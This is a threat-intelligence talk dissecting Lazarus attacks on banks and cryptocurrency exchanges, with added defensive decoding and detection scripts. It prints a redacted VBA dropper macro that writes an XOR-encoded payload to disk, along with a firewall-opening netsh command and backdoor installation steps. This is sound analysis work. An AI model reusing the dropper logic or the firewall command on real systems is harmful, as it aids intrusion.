AREA41 - Anatomy of attacks aimed at financial sector by the Lazarus group
June 28, 2018
Seongsu Park
Senior Security Researcher @ Kaspersky Lab GReAT
Who is Lazarus?
• Notorious APT group
• State-sponsored APT group
• Aimed at financial profit and cyber espionage, sabotage
LAZARUS (sub-groups: Andariel, Bluenoroff, ...)
Well-known attack cases
2013 — DarkSeoul cyber attack
2014 — SPE cyber attack
2016 — Bangladesh bank heist
2017 — WannaCry outbreak
Recent activities of Lazarus
About Manuscrypt
• From when?
- In use since around 2013
- Used actively until recently
• Connection?
- Many overlaps with known Lazarus code style and C&C infrastructure
• Attack where?
- Previously used mostly against national intelligence targets
- Recently used in attacks on the financial sector
Attacks on South Korea
Status of cryptocurrency exchanges in Korea
World TOP 10 cryptocurrency exchanges (chart; the South Korean companies are highlighted)
Korean exchanges have been hacked repeatedly
Infection vectors: malicious HWP, malicious Office document, malicious APK
Weaponized hwp
HWP file format
• Hangul (also known as Hangul Word Processor or HWP) is a proprietary word processing application published by the South Korean company Hancom Inc. - Wikipedia
• Used by most government agencies and government offices due to the government's national software activation policy
• South Korea is one of the few countries where MS Word does not rank first
Recently, PostScript has mainly been used to deliver the payload
Decoy and targets
• Cryptocurrency: any cryptocurrency related news/contents, cryptocurrency market expectations
• Legal issues: related to a lawsuit or audit, forms about legal issues
• Resume: resumes, mainly of finance-related people; some decoys include the victim company name
Relationship (malicious hwp files linked by document metadata: last saved user name, author name)
Malicious hwp
Postscript Type #1
— Postscript contains an asciihex-format executable
— Drops the file into the %startup% folder as a persistence mechanism
— Dropped file is Manuscrypt
Direct drop from the embedded ascii hex string; creation path (+ persistence mechanism)
Structure: asciihex type Manuscrypt -> postscript to drop executable -> drop and execute
Postscript Type #2
— Uses Chinese variable names, e.g. yaoshi, yima, yinzi
— Decrypts the real postscript/shellcode with a hardcoded XOR key
Has an encryption stage with a 4-byte XOR key
Structure: 4-byte XOR key; encrypted postscript and shellcode -> postscript to decrypt -> decrypt; encrypted Manuscrypt executable (encrypted 32-bit Manuscrypt, encrypted 64-bit Manuscrypt)
Postscript Type #2 – Decrypted data
— Decrypted data contains exploit code and shellcode
— Triggers the postscript vulnerability and executes the shellcode
Structure: 4-byte XOR stage -> decrypted postscript and shellcode (heap-spray, exploit code) -> exploit, decrypt payload and inject -> shellcode decrypts the encrypted 32-bit/64-bit Manuscrypt and injects it
Postscript Type #3-4
— Decryption process removed
— Malware author elaborated the exploit code
Structure: elaborated exploit code (postscript + shellcode) -> exploit -> shellcode decrypts the encrypted 32-bit/64-bit Manuscrypt and injects it
Postscript type #5 – add XOR
— Same structure as #3
— Adds a shellcode decryption script with 1-byte XOR
Structure: elaborated exploit code with a script for decryption of the shellcode (postscript + shellcode) -> decrypt & exploit -> shellcode decrypts the encrypted 32-bit/64-bit Manuscrypt and injects it
Postscript type #6
— Same postscript to trigger the vulnerability
— No more embedded payload
— Shellcode only has a download function
Structure: postscript + shellcode -> decrypt & exploit -> download Manuscrypt
Change history of hwp attack
Type #1
• Drop embedded asciihex type payload
Type #2
• Start to use postscript vulnerability
• Decrypt shellcode and exploitation postscript with 4-bytes XOR
• Decrypt payload with 4-bytes XOR key
Type #3
• Remove shellcode/postscript decryption routine
• Elaborate postscript to trigger vulnerability
• Decrypt payload with 4-bytes XOR key
Type #4
• Decrypt payload with AES algorithm
Type #5
• Add shellcode encryption postscript with 1-byte XOR
Type #6
• Change shellcode to just download payload
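The XOR stages in this history are short repeating keys: 4 bytes for the Type #2/#3 payload and postscript, 1 byte for the Type #5/#6 shellcode. An analyst who knows what the decrypted data should start with (for an embedded Manuscrypt executable, a PE header) can recover such a key directly from the ciphertext instead of first reverse-engineering the decryption routine in the PostScript. The following Python is an added example, not code from the talk; it handles both key lengths, and the encrypted blob it runs on is constructed for the demo rather than taken from a real sample.

```python
"""Recover a short repeating XOR key from an expected header and decrypt.

Added example, not code from the talk. The Type #2/#3 hwp samples described
above protect the embedded Manuscrypt payload with a 4-byte XOR key, and
Type #5/#6 protect the shellcode with a 1-byte XOR key. Knowing the expected
plaintext header (here the first 8 bytes of a PE file) is enough to recover
either key. The encrypted blob below is constructed for the demo.
"""
from typing import Tuple

# Typical first 8 bytes of a Windows PE file: "MZ", e_cblp = 0x0090, e_cp = 0x0003.
PE_HEADER_PREFIX = b"MZ\x90\x00\x03\x00\x00\x00"


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR every byte of data with the repeating key (the same call encrypts and decrypts)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(ciphertext: bytes, known_prefix: bytes, key_len: int) -> bytes:
    """Derive a key_len-byte repeating key from a known plaintext prefix.

    Key byte j equals ciphertext[i] ^ plaintext[i] for every i with i % key_len == j;
    if those positions disagree, the guessed key length or header is wrong.
    """
    if len(known_prefix) < key_len:
        raise ValueError("known prefix is shorter than the key length")
    key = bytearray(key_len)
    for j in range(key_len):
        candidates = {ciphertext[i] ^ known_prefix[i]
                      for i in range(j, len(known_prefix), key_len)}
        if len(candidates) != 1:
            raise ValueError(f"inconsistent key byte at offset {j}")
        key[j] = candidates.pop()
    return bytes(key)


def recover_and_decrypt(ciphertext: bytes,
                        known_prefix: bytes = PE_HEADER_PREFIX) -> Tuple[int, bytes, bytes]:
    """Try the key lengths seen in the hwp samples (1 and 4); return (key_len, key, plaintext)."""
    if len(ciphertext) < len(known_prefix):
        raise ValueError("ciphertext is shorter than the expected header")
    for key_len in (1, 4):
        try:
            key = recover_key(ciphertext, known_prefix, key_len)
        except ValueError:
            continue
        plain = xor_repeating(ciphertext, key)
        if plain.startswith(known_prefix):
            return key_len, key, plain
    raise ValueError("no 1- or 4-byte repeating XOR key fits the expected header")


# Constructed stand-in for an "Encrypted 32-bits Manuscrypt" blob: a fake PE header
# plus filler, XORed with a demo key. Not a real sample.
FAKE_PE = PE_HEADER_PREFIX + b"\x04\x00\x00\x00\xff\xff\x00\x00" + b"DEMO PAYLOAD BODY " * 4


def build_demo_sample(key: bytes) -> bytes:
    return xor_repeating(FAKE_PE, key)


if __name__ == "__main__":
    for demo_key in (b"\x13\x37\xca\xfe", b"\xa5"):
        key_len, key, plain = recover_and_decrypt(build_demo_sample(demo_key))
        print(f"recovered {key_len}-byte key {key.hex()}, plaintext starts {plain[:8]!r}")
```

The 1-byte attempt is tried first: against a genuine 4-byte key its candidate set contains several different values, so it fails fast and the 4-byte attempt takes over. The same idea applies to the encrypted postscript/shellcode stage of Type #2, with the expected PostScript header in place of the PE prefix.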
Change history of hwp attack (structure diagrams of Type #1, Type #2, Type #3-4, Type #5 and Type #6, as shown on the previous slides)
Change history of hwp attack (summary table)
Shellcode decryption: Type #2 - 4-bytes XOR; Type #5, #6 - 1-byte XOR
Shellcode triggering: Type #2 to #6 - CVE-2017-8291 (Ghostscript exploit)
Shellcode type: Type #2 to #5 - decrypt embedded payload and inject to legit process; Type #6 - download
Payload decryption: Type #2, #3 - 4-bytes XOR; Type #4, #5 - AES (Type #6 downloads its payload)
Attacker vs Defender
Timeline: 2017-04, 2017-06, 2017-07, 2017-08, 2017-09, 2017-10, 2017-11, 2017-12, 2018-03
ATTACKER SIDE
Type #1: direct drop from asciihex string
Type #2: start to use exploit; XORed shellcode + exploit trigger script
Type #3: polishing exploit script; 4-bytes XOR decryption
Type #4: replace with AES algorithm
Type #5: decrypt shellcode with 1-byte XOR
Type #6: download payload from remote server
DEFENDER SIDE
Detect embedded ascii type executable
Detect XOR postscript routine
Detect embedded shellcode in postscript
Detect embedded encrypted payload
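The four defender-side items above can be turned into heuristics over the PostScript text of an hwp stream. The Python below is an added example, not the talk's detection logic: it decodes every asciihex string literal and looks for an embedded PE (Type #1), for an xor operator inside a loop (Type #2), for a large opaque blob (an encrypted payload or shellcode candidate) and for hex data that reaches exec. The three sample streams are constructed for the demo and the size threshold is an assumption, not a figure from the talk.

```python
"""Heuristic scanner for the PostScript streams embedded in hwp files.

Added example, not the talk's detection logic. The sample streams below are
constructed stand-ins for the layouts described on the slides, not real samples,
and LARGE_BLOB_BYTES is an assumed threshold.
"""
import re
from typing import Dict, List

RE_HEX_STRING = re.compile(r"<([0-9a-fA-F\s]*)>")       # PostScript asciihex string literal
RE_LOOP = re.compile(r"\b(for|repeat|loop|forall)\b")   # looping operators
RE_XOR = re.compile(r"\bxor\b")
RE_EXEC = re.compile(r"\bexec\b")

LARGE_BLOB_BYTES = 4096   # assumption: anything this big is payload-sized, not layout data


def hex_strings(ps_text: str) -> List[bytes]:
    """Decode every asciihex string literal (whitespace inside <...> is legal PostScript)."""
    blobs = []
    for m in RE_HEX_STRING.finditer(ps_text):
        digits = re.sub(r"\s+", "", m.group(1))
        if len(digits) % 2:
            digits += "0"          # PostScript treats a trailing odd digit as if followed by 0
        blobs.append(bytes.fromhex(digits))
    return blobs


def scan_postscript(ps_text: str) -> Dict[str, bool]:
    """Return one flag per heuristic; any True value is worth a closer look."""
    blobs = hex_strings(ps_text)
    findings = {
        "embedded_asciihex_pe": False,   # Type #1: DOS stub + PE signature inside a hex string
        "xor_decode_routine": False,     # Type #2: xor applied inside a loop
        "large_opaque_blob": False,      # encrypted payload / shellcode candidate
        "hex_string_executed": False,    # hex data and an exec in the same stream
    }
    for blob in blobs:
        if blob.startswith(b"MZ") and b"PE\x00\x00" in blob:
            findings["embedded_asciihex_pe"] = True
        elif len(blob) >= LARGE_BLOB_BYTES:
            findings["large_opaque_blob"] = True
    if RE_XOR.search(ps_text) and RE_LOOP.search(ps_text):
        findings["xor_decode_routine"] = True
    if blobs and RE_EXEC.search(ps_text):
        findings["hex_string_executed"] = True
    return findings


def is_suspicious(ps_text: str) -> bool:
    return any(scan_postscript(ps_text).values())


def build_samples() -> Dict[str, str]:
    """Constructed stand-ins for the stream layouts, not real samples."""
    # Type #1 layout: a fake PE (DOS stub, e_lfanew = 0x40, "PE\0\0") stored as asciihex.
    fake_pe = b"MZ" + b"\x00" * 58 + (0x40).to_bytes(4, "little") + b"PE\x00\x00" + b"\x00" * 200
    type1 = "%!PS\n/payload <" + fake_pe.hex() + "> def\n"
    # Type #2 layout: a 4-byte key, an opaque blob, a decoding loop and exec of the result.
    opaque = bytes((i * 73 + 41) & 0xFF for i in range(5000))
    type2 = ("%!PS\n/yaoshi <1337cafe> def\n/yima <" + opaque.hex() + "> def\n"
             "0 1 yima length 1 sub { yima exch dup yima exch get yaoshi 3 index 4 mod get xor put } for\n"
             "yima cvx exec\n")
    benign = "%!PS\n/Helvetica findfont 12 scalefont setfont\n72 720 moveto (Hello) show\nshowpage\n"
    return {"type1_asciihex_drop": type1, "type2_xor_loop": type2, "benign": benign}


if __name__ == "__main__":
    for name, stream in build_samples().items():
        print(name, scan_postscript(stream))
```

Type #3 onwards removed the XOR routine, so only the blob-size and exec heuristics still fire on those; the Type #6 streams carry no embedded payload at all, which is why the slide's defender column stops at "encrypted payload" and later detection has to rely on the exploit script itself.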
Shellcode comparison across types
Different postscripts, but the same shellcode (process searching, get handle)
Shellcode execution flow: get API by hash -> find decryption key -> decrypt payload -> get handle -> inject to legit process
Payload summary
IP-based C&C communication type
• Only used up to type #2
• Not seen after November 2017
• Fake SSL communication
• Full featured backdoor
- File handling
- Process handling
- Execute commands
- Data exfiltration
HTTP-based C&C communication type
• The usually used communication type
• Uses compromised servers
• Full featured backdoor
- System info gathering
- Execute commands
- and so on
Type of C&C servers
COMPROMISED SERVER
— Compromised server
— Direct connection by IP address
— Encrypted channel
COMPROMISED WEB SERVER IN CHINA
— Usually a compromised IIS server
— Attacker's PHP scripts uploaded
— DedeCMS vulnerability
— WordPress vulnerability
COMPROMISED WEB SERVER IN KOREA
— Usually a compromised IIS server
— Attacker's JSP scripts uploaded
— Using a specific board vulnerability
— Using a WordPress vulnerability
Not only hwp files
Persistent attack on the same target (telemetry)
Time | File name | Origin | Country
2017-07-31 07:40:07 | 비트코인_지갑주소_및_거래번호.hwp ("Bitcoin wallet address and transaction number") | e3796387 (web) | KR
2017-07-31 16:25:00 | 비트코인_지갑주소_및_거래번호.doc (same name, Word format) | e3796387 (web) | KR
2017-08-03 18:13:23 | 비트코인 거래내역.xls ("Bitcoin transaction history") | e3796387 (web) | KR
Decoy of malicious hwp / decoy of malicious Word document (screenshots)
Attacks on other countries
Attack methodology
SPEARPHISHING
— Malicious Office document
— Malicious macro embedded
— Decoy: usually a job description or proposal
Structure of Macro
    ' Entry point: runs automatically when the document is opened
    Attribute VB_Name = "Module1"
    Sub Auto_Open()
    On Error GoTo gaqz
    ' --- Macro to create payload ---
    ' Drop path = %TEMP% + file name; the name is stored with every character shifted up by one
    liveOn = "sjop/fyf"
    liveOff = Environ("temp") + "\"
    For qnx = 1 To Len(liveOn)
        liveOff = liveOff + Chr(Asc(Mid$(liveOn, qnx, 1)) - 1)
    Next
    ' The payload is stored as 1635 hex strings of 500 bytes each, every byte XORed with 189
    Dim str(1635) As String
    str(1) = "F0E72DBDBEBDBDBD………[redacted]……………DBDBDBD"
    .... [redacted]….
    str(1635) = "9D9D9D9D9D9D81…. ……[redacted]…..….……DBDBDBD"
    Dim offBin(499) As Byte
    Open liveOff For Binary Access Write As #1
    lpdq = 1
    For jnx = 0 To 1634
        For inx = 0 To 499
            offBin(inx) = Val("&H" + Mid(str(jnx + 1), inx * 2 + 1, 2))
            offBin(inx) = offBin(inx) Xor 189
        Next inx
    ' (remainder of the payload loop not shown on the slide)
    ' --- Macro to create decoy document ---
    liveOn = "EFG492:2/ymt"
    liveOffd = Environ("temp") + "\"
    For qnx = 1 To Len(liveOn)
        liveOffd = liveOffd + Chr(Asc(Mid$(liveOn, qnx, 1)) - 1)
    Next qnx
    ' The decoy is stored as 239 hex strings of 500 bytes each, every byte XORed with 201
    Dim strd(239) As String
    strd(1) = "1906D8296878D328C9C9C9…[redacted]…..36363636363636"
    ...... [redacted]……
    strd(239) = "C9C9C9C9C9C9C9C9C9C9…[redacted]…….D9C9C9C9C9C9C9"
    Dim offBind(499) As Byte
    Open liveOffd For Binary Access Write As #2
    lpdq = 1
    For jnx = 0 To 238
        For inx = 0 To 499
            offBind(inx) = Val("&H" + Mid(strd(jnx + 1), inx * 2 + 1, 2))
            offBind(inx) = offBind(inx) Xor 201
        Next inx
        ' Write the decoded 500-byte record at byte offset lpdq and advance
        Put #2, lpdq, offBind
        lpdq = lpdq + 500
    Next jnx
    Close #2
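Both transformations in the macro can be undone statically, so the dropped files can be rebuilt from a macro dump without ever running it. The Python below is an added example, not code from the talk: it reproduces the Chr(Asc(c) - 1) shift that hides the two file names and the hex-string-XOR-key step that hides the file contents, then labels the result by its file signature. The obfuscated names, the keys 189 and 201, and the un-redacted starts of str(1) and strd(1) are taken from the macro above; everything after those prefixes is redacted on the slide, so the demo decodes only what is visible.

```python
"""Static decoder for the two transformations in the dropper macro above.

Added example, not the talk's code. Constants come from the macro as shown on
the slide; the rest of the hex strings is redacted there.
"""
from typing import Iterable, Optional

# From the macro on the slide
PAYLOAD_NAME_OBF = "sjop/fyf"
DECOY_NAME_OBF = "EFG492:2/ymt"
PAYLOAD_XOR_KEY = 189
DECOY_XOR_KEY = 201
PAYLOAD_CHUNK1_PREFIX = "F0E72DBDBEBDBDBD"        # visible start of str(1)
DECOY_CHUNK1_PREFIX = "1906D8296878D328C9C9C9"   # visible start of strd(1)

# File signatures used to label what the decoded data is
MAGIC = {
    b"MZ": "PE executable",
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "OLE2 compound document (legacy Office file)",
}


def shift_decode(obfuscated: str) -> str:
    """Undo the Chr(Asc(Mid$(s, i, 1)) - 1) loop that builds the drop file name."""
    return "".join(chr(ord(ch) - 1) for ch in obfuscated)


def decode_hex_chunk(chunk: str, key: int) -> bytes:
    """Mirror the inner loop: Val("&H" + two hex digits) Xor key, byte by byte."""
    if len(chunk) % 2:
        raise ValueError("hex chunk must have an even number of digits")
    return bytes(int(chunk[i:i + 2], 16) ^ key for i in range(0, len(chunk), 2))


def rebuild_file(chunks: Iterable[str], key: int) -> bytes:
    """Concatenate decoded chunks in the order the Put #n, lpdq, offBin loop writes them."""
    return b"".join(decode_hex_chunk(c, key) for c in chunks)


def identify(data: bytes) -> Optional[str]:
    """Label the decoded data by its leading magic bytes, or None if unknown."""
    for magic, label in MAGIC.items():
        if data.startswith(magic):
            return label
    return None


def decode_macro_artifacts() -> dict:
    """Apply both decoders to the values visible on the slide."""
    payload_head = rebuild_file([PAYLOAD_CHUNK1_PREFIX], PAYLOAD_XOR_KEY)
    decoy_head = rebuild_file([DECOY_CHUNK1_PREFIX], DECOY_XOR_KEY)
    return {
        "payload_name": shift_decode(PAYLOAD_NAME_OBF),
        "payload_type": identify(payload_head),
        "decoy_name": shift_decode(DECOY_NAME_OBF),
        "decoy_type": identify(decoy_head),
    }


if __name__ == "__main__":
    for k, v in decode_macro_artifacts().items():
        print(f"{k}: {v}")
```

The visible prefixes are enough to confirm what the macro writes: the first eight bytes of str(1) XOR 189 are the MZ/DOS header of a PE file, and the first eight bytes of strd(1) XOR 201 are the OLE2 signature of a legacy Office document, which matches the .xls decoy seen in the telemetry slide. Given the loop bounds on the slide, a full dump would yield 1635 x 500 bytes (about 817 KB) for the payload and 239 x 500 bytes (about 119 KB) for the decoy.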
Who is the target?
Finance, engineering, cryptocurrency
Payload summary
• File search, handling
• Process handling
• Collect system information
• Directory / file listing
• ...
Full-featured backdoor a.k.a. Fallchill
• IP-based C&C communication
- Fake SSL communication (Polar SSL)
- Used compromised servers
• HTTP-based C&C communication
- Compromised ASP hosting IIS server
- Allegedly used a board/CMS vulnerability
C&C server configuration
How did I start this investigation?
Malicious hwp dropped Manuscrypt
Found 1 C&C server in South Korea
— Suspected compromised server
Working closely with an investigation agency
— Investigated the compromised server
— Found one proxy module
Expanding research with our telemetry
— Yara magic!
— Found an additional module from the compromised server
Manuscrypt C2 infrastructure: Manuscrypt infected host -> sends information -> multi-stage proxy servers -> communication -> final-stage C2 server
Manuscrypt C2 geolocations (map)
Malwares/Tools from C&C server
Backdoor variants: the threat actor uses many kinds of backdoors - active backdoor, passive backdoor, HTTP backdoor, IIS backdoor
Proxy malware: main component of the multi-stage proxy structure; forwards incoming traffic to another host
Information harvester: TCP connection harvester to steal inbound/outbound network connections
Other tools: loader to decrypt and execute an encrypted payload; file wiper to securely wipe out specific files
Proxy module
Proxy module: simply forwards traffic from the incoming host to the next hop
Firewall punching: adds to the allowed port list using a Windows command
Fake SSL communication: disguised as SSL handshaking with legit sites
Configuration: stores configuration in a registry key; saves configuration as a specific file; updates the file with data from another hop; decrypts this file when read
Proxy module – P2P proxy
Another infected host <-> listening named pipe (\\.\pipe\AnonymousPipe) / connection to the external named pipe (\\%s\pipe\AnonymousPipe)
Polar SSL encryption
Thread #1: receives data from the global P2P server and writes it to the listening named pipe (\\.\pipe\AnonymousPipe)
Thread #2: reads data from the external named pipe and sends it to the global P2P server
Global P2P C&C server (passive backdoor module installed)
P2P-based C&C infrastructure
Active backdoor
Has a C&C server address and performs backdoor functions
IP-based communications
- Configuration data in a registry key
- Full-featured backdoor
• File / directory listing
• Process handling
• Get system information
• Execute Windows command
• Send screenshot
HTTP-based communications
- Same configuration data as the IP-based backdoor
- Chooses the HEAD, GET or POST method randomly when communicating with the C&C server
- Full-featured backdoor
Passive backdoor
Doesn't have a C&C server address; opens a port and waits for connections
INSTALLATION PROCESS
- Get the Windows service list and choose one (e.g. choose the "SharedAccess" service)
- Get the display name of the service and append "Service" (e.g. change the "Internet Connection Sharing (ICS)" display name to "Internet Connection Sharing Service")
- Append decrypted strings to the service display name (e.g. append "is an essential element in Windows System configuration and management.")
- Change the service name to lower case and append "svc" (e.g. SharedAccess -> sharedaccesssvc)
- Drop the payload under the service name (e.g. drop the payload to sharedaccesssvc.dll)
- Change the file timestamp
F/W Punching
cmd.exe /c netsh firewall add portopening TCP [Port] "adp"
Backdoor functions
- Almost the same as the active backdoor
- Some variants have routing functions
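Every step of that installation process leaves a host artefact that can be checked for: a service whose name is an existing service name lower-cased plus "svc", a display name or description carrying the boilerplate sentence, a DLL named after the new service, and a legacy netsh portopening rule named "adp". The Python below is an added example, not the talk's tooling: it encodes those checks as rules over a service inventory and a list of captured command lines (for instance exported with sc query and a process-creation log) and runs them over constructed sample records. The Service record, its field names and the sample data are assumptions; the appended sentence, the "adp" rule name and the SharedAccess example come from the slide.

```python
"""Hunt for the passive-backdoor installation pattern described above.

Added example, not the talk's tooling. The Service record and the sample data
are constructed for the demo; the boilerplate sentence, the "adp" rule name and
the SharedAccess example are taken from the slide.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

APPENDED_PHRASE = "is an essential element in Windows System configuration and management."
SUSPICIOUS_RULE_NAME = "adp"
RE_PORTOPENING = re.compile(
    r'netsh\s+firewall\s+add\s+portopening\s+(TCP|UDP)\s+(\d+)\s+"?([^"\s]+)"?', re.I)


@dataclass
class Service:
    name: str                 # service key name, e.g. SharedAccess
    display_name: str         # e.g. Internet Connection Sharing (ICS)
    binary: str               # path of the service DLL/EXE
    description: str = ""


def find_masquerading_services(services: List[Service]) -> List[Dict[str, object]]:
    """Return services matching the naming pattern, with the reasons for each hit."""
    by_name = {s.name.lower(): s for s in services}
    hits = []
    for s in services:
        lname = s.name.lower()
        stem = lname[:-3] if lname.endswith("svc") else None
        # Primary indicators: name derived from another service, or the boilerplate sentence.
        derived = stem is not None and stem in by_name and by_name[stem] is not s
        phrase = APPENDED_PHRASE in s.display_name or APPENDED_PHRASE in s.description
        if not (derived or phrase):
            continue   # legitimate *Svc services without a twin are left alone
        reasons = []
        if derived:
            reasons.append(f"service name is '{by_name[stem].name}' lower-cased plus 'svc'")
        if phrase:
            reasons.append("display name/description carries the appended boilerplate sentence")
        # Corroboration: DLL named after the service, display name copied plus "Service".
        basename = s.binary.replace("\\", "/").rsplit("/", 1)[-1].lower()
        if basename == lname + ".dll":
            reasons.append("binary file name equals the service name")
        if derived and s.display_name.endswith("Service"):
            base_display = by_name[stem].display_name.split(" (")[0]   # drop "(ICS)"-style suffix
            if s.display_name.startswith(base_display):
                reasons.append("display name is the copied service's display name plus 'Service'")
        hits.append({"service": s.name, "binary": s.binary, "reasons": reasons})
    return hits


def find_suspicious_portopenings(command_lines: List[str]) -> List[Tuple[str, int, str]]:
    """Pick out legacy 'netsh firewall add portopening' commands whose rule name is 'adp'."""
    found = []
    for line in command_lines:
        m = RE_PORTOPENING.search(line)
        if m and m.group(3).lower() == SUSPICIOUS_RULE_NAME:
            found.append((m.group(1).upper(), int(m.group(2)), m.group(3)))
    return found


# Constructed sample inventory: three ordinary services and one planted twin.
SAMPLE_SERVICES = [
    Service("SharedAccess", "Internet Connection Sharing (ICS)", r"C:\Windows\System32\ipnathlp.dll"),
    Service("W32Time", "Windows Time", r"C:\Windows\System32\w32time.dll"),
    Service("WinHttpAutoProxySvc", "WinHTTP Web Proxy Auto-Discovery Service",
            r"C:\Windows\System32\winhttp.dll"),
    Service("sharedaccesssvc", "Internet Connection Sharing Service",
            r"C:\Windows\System32\sharedaccesssvc.dll",
            description="Internet Connection Sharing Service " + APPENDED_PHRASE),
]

# Constructed command lines as a process-creation log would record them.
SAMPLE_COMMAND_LINES = [
    'cmd.exe /c netsh firewall add portopening TCP 443 "adp"',
    'netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389',
    'cmd.exe /c netsh firewall add portopening TCP 8080 "MyApp"',
]

if __name__ == "__main__":
    for hit in find_masquerading_services(SAMPLE_SERVICES):
        print(hit["service"], hit["binary"], hit["reasons"])
    print(find_suspicious_portopenings(SAMPLE_COMMAND_LINES))
```

The "binary named after the service" check is deliberately only corroboration: plenty of legitimate services (W32Time and w32time.dll in the sample) satisfy it on their own, so it is scored only once a primary indicator has fired. The timestamp change from the last installation step is not modelled here; it is better caught by comparing the DLL's $STANDARD_INFORMATION and $FILE_NAME timestamps in the MFT.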
Other tools
Log wiper: generates a random buffer, overwrites the file with that data repeatedly, then deletes the file
TCP connection harvester: chooses the proper API depending on the OS version
File names (screenshot)
Malwares/Tools from C&C server (map)
Countries: Indonesia, India, Bangladesh, Malaysia, Vietnam, Korea, Taiwan, Thailand
Tools: active backdoor, passive backdoor, proxy, TCP conn harvester, IIS backdoor, HTTP backdoor
Malwares/Tools from C&C server (map, Case #1 and Case #2)
Countries: India, Colombia, Dominican Republic, Germany, Indonesia, South Korea, Sri Lanka, Panama, Vietnam
Tools: active backdoor, proxy, HTTP backdoor, passive backdoor, TCP conn harvester
Vulnerability information
IP            | Web server ver | OS fingerprinting
2xx.xx.xx.xxx | N/A            | Windows Server 2003 R2
5x.xx.xx.xxx  | IIS 6.0        | Aggressive OS guesses: Microsoft Windows Server 2003 (91%), Microsoft Windows Server 2003 SP2 (91%)
2xx.xx.xx.xxx | IIS 6.0        | N/A
1xx.xx.xx.xxx | IIS 6.0        | Aggressive OS guesses: Microsoft Windows 2003 R2 (93%), Microsoft Windows Server 2003 (93%), Microsoft Windows Server 2003 SP2 (93%)
2xx.xx.xx.xxx | IIS 6.0        | Aggressive OS guesses: Microsoft Windows XP SP3 or Windows Server 2003 SP2 (97%), Microsoft Windows Server 2003 SP2 (94%)
1xx.xx.xx.xxx | IIS 6.0        | Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (99%), Microsoft Windows XP SP3 or Windows Server 2003 SP2 (97%), Microsoft Windows Server 2003 SP2 (94%)
2xx.xx.xx.xxx | IIS 6.0        | N/A
2xx.xx.xx.xxx | IIS 6.0        | Aggressive OS guesses: Microsoft Windows Server 2003 SP2 (89%)
5x.xx.xx.xxx  | N/A            | Aggressive OS guesses: Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows Server 2003 SP1 - SP2 (92%)
Vulnerability information (CVE-2017-7269 timeline)
2017-03-26: CVE-2017-7269 published
2017-03-31: PoC for CVE-2017-7269 added to a Metasploit module
2017-04-11: attack tool for this exploit was created
2017-06-13: Microsoft published a patch for this vulnerability
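Read together, the fingerprint table and the timeline say the same thing: nearly every C&C host is IIS 6.0 on Windows Server 2003, and the actor had a working tool for CVE-2017-7269 two months before a patch existed. The Python below is an added example, not part of the talk; it classifies rows shaped like the table above against that IIS 6.0 / Server 2003 profile and computes the gaps between the timeline dates. The rows and dates are copied from the slides (the IPs are masked there and stay masked here); the category names are assumptions.

```python
"""Triage of the C&C server fingerprints and the CVE-2017-7269 timeline above.

Added example, not part of the talk. Rows and dates are copied from the slides;
category names are assumptions.
"""
from collections import Counter
from datetime import date
from typing import Dict, Iterable, List, Tuple

FINGERPRINTS: List[Tuple[str, str, str]] = [
    ("2xx.xx.xx.xxx", "N/A", "Windows Server 2003 R2"),
    ("5x.xx.xx.xxx", "IIS 6.0", "Microsoft Windows Server 2003 (91%), Microsoft Windows Server 2003 SP2 (91%)"),
    ("2xx.xx.xx.xxx", "IIS 6.0", "N/A"),
    ("1xx.xx.xx.xxx", "IIS 6.0", "Microsoft Windows 2003 R2 (93%), Microsoft Windows Server 2003 (93%), "
                                 "Microsoft Windows Server 2003 SP2 (93%)"),
    ("2xx.xx.xx.xxx", "IIS 6.0", "Microsoft Windows XP SP3 or Windows Server 2003 SP2 (97%), "
                                 "Microsoft Windows Server 2003 SP2 (94%)"),
    ("1xx.xx.xx.xxx", "IIS 6.0", "Microsoft Windows Server 2003 SP1 or SP2 (99%), Microsoft Windows XP SP3 "
                                 "or Windows Server 2003 SP2 (97%), Microsoft Windows Server 2003 SP2 (94%)"),
    ("2xx.xx.xx.xxx", "IIS 6.0", "N/A"),
    ("2xx.xx.xx.xxx", "IIS 6.0", "Microsoft Windows Server 2003 SP2 (89%)"),
    ("5x.xx.xx.xxx", "N/A", "Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows Server 2003 SP1 - SP2 (92%)"),
]

TIMELINE: Dict[str, date] = {
    "disclosure": date(2017, 3, 26),      # CVE-2017-7269 published
    "metasploit_poc": date(2017, 3, 31),  # PoC added to a Metasploit module
    "attack_tool": date(2017, 4, 11),     # attack tool for this exploit created
    "patch": date(2017, 6, 13),           # Microsoft patch published
}


def classify(web_server: str, os_guess: str) -> str:
    """Place one fingerprint row relative to the IIS 6.0 on Windows Server 2003 profile."""
    iis6 = "IIS 6.0" in web_server
    w2k3 = "2003" in os_guess
    if iis6 and w2k3:
        return "iis6_on_server2003"      # full match for the CVE-2017-7269 profile
    if iis6:
        return "iis6_os_unknown"         # banner matches, OS not fingerprinted
    if w2k3:
        return "server2003_no_banner"    # OS matches, web server not identified
    return "other"


def triage(rows: Iterable[Tuple[str, str, str]]) -> Dict[str, int]:
    """Count rows per category."""
    return dict(Counter(classify(web, os_) for _ip, web, os_ in rows))


def timeline_gaps(t: Dict[str, date]) -> Dict[str, int]:
    """Days between the timeline events."""
    def days(a: str, b: str) -> int:
        return (t[b] - t[a]).days
    return {
        "poc_after_disclosure": days("disclosure", "metasploit_poc"),
        "attack_tool_after_disclosure": days("disclosure", "attack_tool"),
        "patch_after_disclosure": days("disclosure", "patch"),
        "attack_tool_before_patch": days("attack_tool", "patch"),
    }


if __name__ == "__main__":
    print(triage(FINGERPRINTS))
    print(timeline_gaps(TIMELINE))
```

Nine hosts, none of which contradicts the profile: five match it outright, two have the IIS 6.0 banner with no OS guess, and two fingerprint as Server 2003 without a web-server banner. The timeline gaps show the exposure window that made these servers usable as C&C: the tool was built 16 days after disclosure and 63 days before the patch.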
Let's put them together
Infrastructure diagram: C&C server infrastructure (active backdoor, passive backdoor, proxy module, TCP harvester, ...) is configured and the infected hosts are controlled through it; the victim (Manuscrypt infected, via weaponized hwp/doc) communicates with the multi-stage C&C; corporate users: sometimes corporate hosts are infected from the server
Takeaways
• Never let your servers be compromised by them
• They keep polishing their tools
• Their favorite attack vector is spearphishing
